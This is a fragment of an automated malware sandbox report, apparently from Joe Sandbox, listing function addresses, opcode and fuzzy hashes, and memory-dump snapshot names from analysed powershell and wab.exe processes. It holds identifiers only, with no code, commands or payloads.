                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$(fll$(fll
                                                                                  • API String ID: 0-2347424031
                                                                                  • Opcode ID: 9b4bed503e172c62464b4972ff547f33b09e5b23c2003464f3644be37ce550de
                                                                                  • Instruction ID: 0dd70d1a196a504d1c8cd77c4952c968f81248ba684b01508c1d045fe2fe1fa3
                                                                                  • Opcode Fuzzy Hash: 9b4bed503e172c62464b4972ff547f33b09e5b23c2003464f3644be37ce550de
                                                                                  • Instruction Fuzzy Hash: AAA16EB1A04701DBDB24CF54C580AAEB7F2EF89754F14882ADE066B654CBB2F846CF51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 07759C10 Relevance: 5.2, Strings: 4, Instructions: 250COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$(fll$(fll
                                                                                  • API String ID: 0-2347424031
                                                                                  • Opcode ID: af84e398c9582b1ed3eca0e8ea22666b580803dd4dbbae3423b06f2075c8a138
                                                                                  • Instruction ID: c4a045a1f121b112cc67e1d18921f8a5040e3ef7f0497d7e6c59a03f8f1c8f52
                                                                                  • Opcode Fuzzy Hash: af84e398c9582b1ed3eca0e8ea22666b580803dd4dbbae3423b06f2075c8a138
                                                                                  • Instruction Fuzzy Hash: F5A16BB1A00705DBDB24CF54C580AAEB7B2EF89754F14882ADE066B744CBB2F846CF51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0775A048 Relevance: 5.2, Strings: 4, Instructions: 192COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (fll$(fll$(fll$(fll
                                                                                  • API String ID: 0-2347424031
                                                                                  • Opcode ID: b09cbc2f2a3a9d91e10f1730d0d82720a58359b7847d614d233708673cbcdd48
                                                                                  • Instruction ID: 180c398fe1465fe97ead1f549545cbcc80df683aea09ad539f8c4b036d36a897
                                                                                  • Opcode Fuzzy Hash: b09cbc2f2a3a9d91e10f1730d0d82720a58359b7847d614d233708673cbcdd48
                                                                                  • Instruction Fuzzy Hash: 66718FB0B01205DFDB14CF98C551AAEBBB2EF88350F15CA69D905AB315CB72DC41CBA6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 07756368 Relevance: 5.1, Strings: 4, Instructions: 108COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 84jl$84jl$tP]q$tP]q
                                                                                  • API String ID: 0-750853176
                                                                                  • Opcode ID: 59f288b6ca70794a8addd00a255998c6a313ce430d8eb64f8a1f3b94388afd66
                                                                                  • Instruction ID: b88b2a906bdd8347a9a660dfe9898f52bc6f9b15f704b47545ac17d6c72a033f
                                                                                  • Opcode Fuzzy Hash: 59f288b6ca70794a8addd00a255998c6a313ce430d8eb64f8a1f3b94388afd66
                                                                                  • Instruction Fuzzy Hash: 4831BCB0605355AFC7118B6C98116AABFB1EF86B20F48889ADC45DF352CA71DC45C3F2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 07755738 Relevance: 5.1, Strings: 4, Instructions: 104COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $]q$$]q$$]q$$]q
                                                                                  • API String ID: 0-858218434
                                                                                  • Opcode ID: fc9691384906095d8d15a363d750dad8d3d4a5162f5f70ece369d26a62a9fc4d
                                                                                  • Instruction ID: ef2bdb30a98a3d0a6895e7d0fecde63ea7c0297b23f4e24d7a13014a3250c617
                                                                                  • Opcode Fuzzy Hash: fc9691384906095d8d15a363d750dad8d3d4a5162f5f70ece369d26a62a9fc4d
                                                                                  • Instruction Fuzzy Hash: 303135B0310201ABE6241639985173AB79BDFC0B40F604C3A9E42DF385DDB6D80483B2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 07750CB8 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $]q$$]q$$]q$$]q
                                                                                  • API String ID: 0-858218434
                                                                                  • Opcode ID: 030033e33e9c6ceaf4e8f2f07be252f71b40d96c9c14f7d42b6da1d78642d429
                                                                                  • Instruction ID: e2fb1f4a5d8ca0a4ef6236a6f3fa61e27869a7566f9c1b201df3a860ff020558
                                                                                  • Opcode Fuzzy Hash: 030033e33e9c6ceaf4e8f2f07be252f71b40d96c9c14f7d42b6da1d78642d429
                                                                                  • Instruction Fuzzy Hash: C62137B13103065BEB245B7D8850B77B6D6AFC1751F24882A9D0ACB381CDB6D855C362
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0775AEA8 Relevance: 5.1, Strings: 4, Instructions: 67COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $]q$$]q$$]q$$]q
                                                                                  • API String ID: 0-858218434
                                                                                  • Opcode ID: 840942e0325c8d816141849b379c04671462917d039c21a408552cd9643b0b94
                                                                                  • Instruction ID: e7743c90fb804f5c6e3cd48ba86c0d2bb2b573071d7c0458cfd2b91f838fc9d2
                                                                                  • Opcode Fuzzy Hash: 840942e0325c8d816141849b379c04671462917d039c21a408552cd9643b0b94
                                                                                  • Instruction Fuzzy Hash: 1711D2F1A00306DBDB248F598580A76BFF0AF51690F56CA7BDC098B281D7B2C545CB51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 077554E7 Relevance: 5.1, Strings: 4, Instructions: 56COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$4']q$$]q$$]q
                                                                                  • API String ID: 0-978391646
                                                                                  • Opcode ID: 937985fc4ccfe1c8c81169110ee4b52f8ed68fc81c6b20d50804e6c4b569390e
                                                                                  • Instruction ID: 70439fe9f04e39858ffa05cb9b60d0830f485f6c607176a23b75875bca8e5120
                                                                                  • Opcode Fuzzy Hash: 937985fc4ccfe1c8c81169110ee4b52f8ed68fc81c6b20d50804e6c4b569390e
                                                                                  • Instruction Fuzzy Hash: F61159B1B542098BC72C8F1CA8D0825BBEBAF416A036445BFD856CF26BC690CC02C745
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 07751749 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000005.00000002.2420009704.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_5_2_7750000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$4']q$$]q$$]q
                                                                                  • API String ID: 0-978391646
                                                                                  • Opcode ID: d5dca9e2f07a42a71f45139631c864954a9452d146e20fa8cc01f07a452f1f36
                                                                                  • Instruction ID: b04681ec43f0bfce0e92bbd1b0234820062ec07b497ab2423e1b854c5655750f
                                                                                  • Opcode Fuzzy Hash: d5dca9e2f07a42a71f45139631c864954a9452d146e20fa8cc01f07a452f1f36
                                                                                  • Instruction Fuzzy Hash: DD01F17170839A4FC72A036C18602656FB2CFC3A917660CA3C881CF247DAA94C0AC3A7
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Executed Functions

                                                                                  Function 000EE58D Relevance: 4.3, Strings: 3, Instructions: 512COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Xaq$$]q$%
                                                                                  • API String ID: 0-943905293
                                                                                  • Opcode ID: a3ae134695f52c61bb102ff903c57c9b3226c6bfd64eadbf1bb0ef7909e52750
                                                                                  • Instruction ID: 0f02181faf937c47d33ede01bffe23d71c50f0b5feddda9fcb711e09c203bc10
                                                                                  • Opcode Fuzzy Hash: a3ae134695f52c61bb102ff903c57c9b3226c6bfd64eadbf1bb0ef7909e52750
                                                                                  • Instruction Fuzzy Hash: A1F15C71B042E88FCF19AB79D8555AE7BA3BFC5350B18802AE406E7355CE39CC05C796
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000EAA3A Relevance: 2.8, Instructions: 2777COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5e1cbf126123d9a91a5ffd8cf3d245ff4bfaef651cbd60e53bda69d604213878
                                                                                  • Instruction ID: a5ac78be7f216befb21d3b88e63fa9acb39a9ab4fe86d45028ea0d102723f83e
                                                                                  • Opcode Fuzzy Hash: 5e1cbf126123d9a91a5ffd8cf3d245ff4bfaef651cbd60e53bda69d604213878
                                                                                  • Instruction Fuzzy Hash: C7530631C10B5A8EDB51EB68C8846A9F7B1FF99300F11D79AE44877121EB70AAD5CF81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000E4A98 Relevance: .3, Instructions: 266COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b19eb308340be5c0c430d7d12fe9e3db5d49f0c23acb127c7da2bcf37635a6b7
                                                                                  • Instruction ID: a7bc6682829724fa951470cde9d433263a5b7d7e462f75b5064a3c17bc5a9630
                                                                                  • Opcode Fuzzy Hash: b19eb308340be5c0c430d7d12fe9e3db5d49f0c23acb127c7da2bcf37635a6b7
                                                                                  • Instruction Fuzzy Hash: 4DB14E70E04249CFDF54CFAAC98579DBBF2AF88314F248529D819FB254EB749885CB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000E3E80 Relevance: .2, Instructions: 238COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 922dcc391bef402d8bca255194b599e85aae02c475c1f82bcea448776448f6e5
                                                                                  • Instruction ID: b9c1926ac781afc3816bd64b546990ee9e1e578490c0a440a197295811f9634a
                                                                                  • Opcode Fuzzy Hash: 922dcc391bef402d8bca255194b599e85aae02c475c1f82bcea448776448f6e5
                                                                                  • Instruction Fuzzy Hash: A0914B70E00289DFDF54CFAAC98579EBBF2AF88304F148129E415B7254EB749986CB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000EED18 Relevance: 2.9, Strings: 2, Instructions: 398COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Te]q$Te]q
                                                                                  • API String ID: 0-3320153681
                                                                                  • Opcode ID: b304a2f6d41c5a460ede1e19313bf804b0c6cb5ddfb7ee702412a2e4ccd49082
                                                                                  • Instruction ID: 3d4988e64ecadeeecb8d7d237bb12c0863f3605cb0576bb3c7e278c2551c0660
                                                                                  • Opcode Fuzzy Hash: b304a2f6d41c5a460ede1e19313bf804b0c6cb5ddfb7ee702412a2e4ccd49082
                                                                                  • Instruction Fuzzy Hash: 15E15C34A00299CFDB64DB69C890AADB7F2FF89304F608569E40AEB351CB75DD46CB41
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000EFC40 Relevance: 1.5, Strings: 1, Instructions: 208COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: PH]q
                                                                                  • API String ID: 0-3168235125
                                                                                  • Opcode ID: 2ec6bd76ba4cb1984e779fd3ae2f3ce9a7b1a0f9ebcb23576d4bdf669558438f
                                                                                  • Instruction ID: 01345edab51c97a711623dad4092d7e0bbb47385fb8a18b2cac33f7a9d0f7a40
                                                                                  • Opcode Fuzzy Hash: 2ec6bd76ba4cb1984e779fd3ae2f3ce9a7b1a0f9ebcb23576d4bdf669558438f
                                                                                  • Instruction Fuzzy Hash: 415133317002568FEB589B7598506BE7BE6AFC5750F244839D40AEB395DE34EC02C3D1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000E7D90 Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LR]q
                                                                                  • API String ID: 0-3081347316
                                                                                  • Opcode ID: d8d8212bcdee035803d9c9f5a539581ce70889c6f8b390ee777623c80b729962
                                                                                  • Instruction ID: eae68db6d925c899bdb50cc432d002efe1ff75f526bd23ceb4bd3dd126f4fc0f
                                                                                  • Opcode Fuzzy Hash: d8d8212bcdee035803d9c9f5a539581ce70889c6f8b390ee777623c80b729962
                                                                                  • Instruction Fuzzy Hash: 9131A030E18289CFDB64DBA5C8447AEB7F1EF89304F604565E40AFB240E7749D42CB51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000EFCF9 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: PH]q
                                                                                  • API String ID: 0-3168235125
                                                                                  • Opcode ID: efff9d858d7b6035aad518cdab712be7888d681d5b371720d788ab87106370d7
                                                                                  • Instruction ID: 2ea10e6757a7e5c982fd946e22f3c283d2ecb0ae4b11d7aaf6f577835344bab3
                                                                                  • Opcode Fuzzy Hash: efff9d858d7b6035aad518cdab712be7888d681d5b371720d788ab87106370d7
                                                                                  • Instruction Fuzzy Hash: AC31C1317042468FDB58AB71C85467EBBE3AF85340F284939D406EB3A5DE78EC42CB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000E7D84 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LR]q
                                                                                  • API String ID: 0-3081347316
                                                                                  • Opcode ID: c3be151fffc77953dac8f9f53a52b90293347268c64fec45132d6d7270638889
                                                                                  • Instruction ID: 0b3bd6c93692f3fcc7e58135645fd955a6bdcb5158a3d1851dfd4dbdccc6a8a8
                                                                                  • Opcode Fuzzy Hash: c3be151fffc77953dac8f9f53a52b90293347268c64fec45132d6d7270638889
                                                                                  • Instruction Fuzzy Hash: 08316E30E1425ADFDB55CFA5C8407AEB3B2EF99300F208569E80AFB240E774AC42CB51
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000E6B99 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: LR]q
                                                                                  • API String ID: 0-3081347316
                                                                                  • Opcode ID: ff88f047e9c2a5a24b536ac82e5fff7c2de8b6b6848bc0f7ba88abfbcde498ee
                                                                                  • Instruction ID: b97cc318bdb28dcae155a293dbae87e8fd373af9e39c5bc2ca49a07dd7ecb49e
                                                                                  • Opcode Fuzzy Hash: ff88f047e9c2a5a24b536ac82e5fff7c2de8b6b6848bc0f7ba88abfbcde498ee
                                                                                  • Instruction Fuzzy Hash: E02140327041008FC701AB79D064B9EBBB2EF8A700F1048ADE04ACB386DE369C45CB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000E0838 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Co
                                                                                  • API String ID: 0-3798529171
                                                                                  • Opcode ID: 46ca4161a4eb89fc22452f62e9f3184efffcb5aae85f8ecbaed331732b54ee96
                                                                                  • Instruction ID: 0db62c1af6faeddb3ac05b6e39c3d879b5a647fee792216583e0ad6a98fedc8f
                                                                                  • Opcode Fuzzy Hash: 46ca4161a4eb89fc22452f62e9f3184efffcb5aae85f8ecbaed331732b54ee96
                                                                                  • Instruction Fuzzy Hash: B2110630B002458FEFA45A6ACA4136E37A5DB41314F10493AE08AFB282DEECCCC18BC1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000E0848 Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Co
                                                                                  • API String ID: 0-3798529171
                                                                                  • Opcode ID: 7b434173d6a3219ddc98e693a265f879ae2221aa22d536117910e5003afa55bf
                                                                                  • Instruction ID: 4c098edcdb22713abe2f51d186de96318545cf5b3ee2231e673d93abc14a8373
                                                                                  • Opcode Fuzzy Hash: 7b434173d6a3219ddc98e693a265f879ae2221aa22d536117910e5003afa55bf
                                                                                  • Instruction Fuzzy Hash: 2D119830B002448FEFA45A7ADA5476D76E5EF45310F50497AE08AEF251DEA8CCC1CBD1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000EE219 Relevance: 1.3, Strings: 1, Instructions: 60COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: |
                                                                                  • API String ID: 0-2343686810
                                                                                  • Opcode ID: 9485f8c07f05139558d202fc5080acd8bd615269386f17351c79576b4efa0f9b
                                                                                  • Instruction ID: 29d67c5eefc0e6e2b28b6ab7e5a4cead00a2ecd23ef02178f09d2328761fe322
                                                                                  • Opcode Fuzzy Hash: 9485f8c07f05139558d202fc5080acd8bd615269386f17351c79576b4efa0f9b
                                                                                  • Instruction Fuzzy Hash: 1E118971F102548FDB44AF78C809BAEBBF6AF48710F108469E51AE73A5DA3999018B80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000EE228 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: |
                                                                                  • API String ID: 0-2343686810
                                                                                  • Opcode ID: aceba4c9b8ef54550948d90cf3b8b28f3053911499500cadc9b3379b633cdf8e
                                                                                  • Instruction ID: 5fe822839152caeff807f4df0d953e8c37d308110930ff65374a0d2d320db955
                                                                                  • Opcode Fuzzy Hash: aceba4c9b8ef54550948d90cf3b8b28f3053911499500cadc9b3379b633cdf8e
                                                                                  • Instruction Fuzzy Hash: C3115E70F002149FDB549F78C805BAE77F5AF4C710F108469E60AE73A0DB799D018B90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000E86C7 Relevance: .6, Instructions: 592COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a80b4987e3ad0c55fdc443e8f88e4d72f93dbf1469c7c7c801f414370b121fb4
                                                                                  • Instruction ID: 1e548ccfe7c34a8496d976e1d62a13a190907327bf2a7aede75ecb1c2d56fc24
                                                                                  • Opcode Fuzzy Hash: a80b4987e3ad0c55fdc443e8f88e4d72f93dbf1469c7c7c801f414370b121fb4
                                                                                  • Instruction Fuzzy Hash: 92225D30700601DFCB59AB78D595A6937A6FB96300B648A39E00ADF365CF39EC47CB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000E8711 Relevance: .6, Instructions: 569COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ef2c9de54aae6b780ed8c36498531ef244d204fe85d5197e7d54dd3cff3578ed
                                                                                  • Instruction ID: 2192670b6c0f1fb409bc1d9e8bb738abc17e2bd891ee054f24ef47149df6f123
                                                                                  • Opcode Fuzzy Hash: ef2c9de54aae6b780ed8c36498531ef244d204fe85d5197e7d54dd3cff3578ed
                                                                                  • Instruction Fuzzy Hash: 90224F30700601DFCB59AB78D595A6936A6FB96304B648A39F00ADF365CF39EC47CB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000E875F Relevance: .6, Instructions: 550COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 53be9744197aca0e503b5961dcf1782c6b24f6eca7af90786be93281130ea943
                                                                                  • Instruction ID: 11c7025df9a5c5375956f9b68789c67cb2d445ed7395c3b5464df65bcb15a46a
                                                                                  • Opcode Fuzzy Hash: 53be9744197aca0e503b5961dcf1782c6b24f6eca7af90786be93281130ea943
                                                                                  • Instruction Fuzzy Hash: 95126F30700601DFCB59AB78D495A6936A6FB96300B648A39F00ADF365CF39EC47CB81
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000EA26B Relevance: .4, Instructions: 389COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2a77a117204df47198a76b7c4088c01f1ef9f56f1ae1b2ceb43adae90b26b18b
                                                                                  • Instruction ID: ecc619beb2d0de984133360c4101b77d0b194e4aa3318ed3744c2e244b43272f
                                                                                  • Opcode Fuzzy Hash: 2a77a117204df47198a76b7c4088c01f1ef9f56f1ae1b2ceb43adae90b26b18b
                                                                                  • Instruction Fuzzy Hash: 96E18274B002458FDB54DF69C994AADB7F2EF8A310F248429E405E7391DB35EC46CB92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 000EDCF8 Relevance: .3, Instructions: 339COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3277224389.00000000000E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_e0000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 34ecc99f6012fb87f251ecc57e7e45dfdbcbdf838aa4735ec616b6fa0fd46bae
